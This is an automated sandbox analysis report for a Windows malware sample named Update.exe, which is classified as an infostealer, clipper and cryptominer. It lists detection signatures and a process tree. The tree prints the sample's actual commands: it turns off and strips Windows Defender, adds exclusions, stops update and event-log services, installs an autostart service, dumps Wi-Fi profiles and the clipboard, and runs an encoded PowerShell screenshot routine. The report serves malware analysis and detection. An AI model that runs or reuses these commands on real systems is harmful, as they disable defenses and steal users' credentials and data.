Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Update.exe

Overview

General Information

Sample name:Update.exe
Analysis ID:1507718
MD5:aab47056de8f4ba6869eafae3a5eba7b
SHA1:75c6e05524d62adeedc0258081a813db6803467a
SHA256:cd809723bc2b248ad6e546c36922e4a3f8b3d8bfdcf7d1448f1307ce7de27118
Infos:

Detection

Blank Grabber, Redline Clipper, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Sigma detected: Stop EventLog
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Blank Grabber
Yara detected Redline Clipper
Yara detected Telegram RAT
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Detected Stratum mining protocol
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the context of a thread in another process (thread injection)
Potentially malicious time measurement code found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Removes signatures from Windows Defender
Sample is not signed and drops a device driver
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Very long command line found
Writes or reads registry keys via WMI
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates driver files
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Update.exe (PID: 6852 cmdline: "C:\Users\user\Desktop\Update.exe" MD5: AAB47056DE8F4BA6869EAFAE3A5EBA7B)
    • Update.exe (PID: 1184 cmdline: "C:\Users\user\Desktop\Update.exe" MD5: AAB47056DE8F4BA6869EAFAE3A5EBA7B)
      • cmd.exe (PID: 3192 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 908 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 4340 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3848 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5296 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7136 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8 cmdline: C:\Windows\system32\cmd.exe /c "start bound.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • bound.exe (PID: 7176 cmdline: bound.exe MD5: 3932062DD4DCEDBD1EEAE026F8E8B562)
          • Build.exe (PID: 7424 cmdline: "C:\Users\user\AppData\Local\Temp\Build.exe" MD5: 1505B202551976B8543C4B233F50FCA8)
            • powershell.exe (PID: 7688 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 9092 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 9108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • wusa.exe (PID: 7228 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
            • sc.exe (PID: 9100 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 9116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 8180 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 8112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 8036 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • sc.exe (PID: 7936 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 8360 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 8300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 8084 cmdline: C:\Windows\system32\sc.exe delete "JLDYOGXF" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 8500 cmdline: C:\Windows\system32\sc.exe create "JLDYOGXF" binpath= "C:\ProgramData\bmqxekewprir\nfblozsybbjy.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 8492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 8476 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 8452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 8472 cmdline: C:\Windows\system32\sc.exe start "JLDYOGXF" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 2668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • lf6o4T3T.exe (PID: 7628 cmdline: "C:\Users\user\AppData\Local\Temp\lf6o4T3T.exe" MD5: D4111CF483F20E0911E201EB512D0B75)
      • cmd.exe (PID: 4192 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7208 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7452 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7640 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7468 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7608 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7904 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7992 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7976 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5436 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8036 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7480 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
        • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8044 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7516 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 8072 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 7412 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 1068 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 8268 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 7568 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8368 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 8748 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
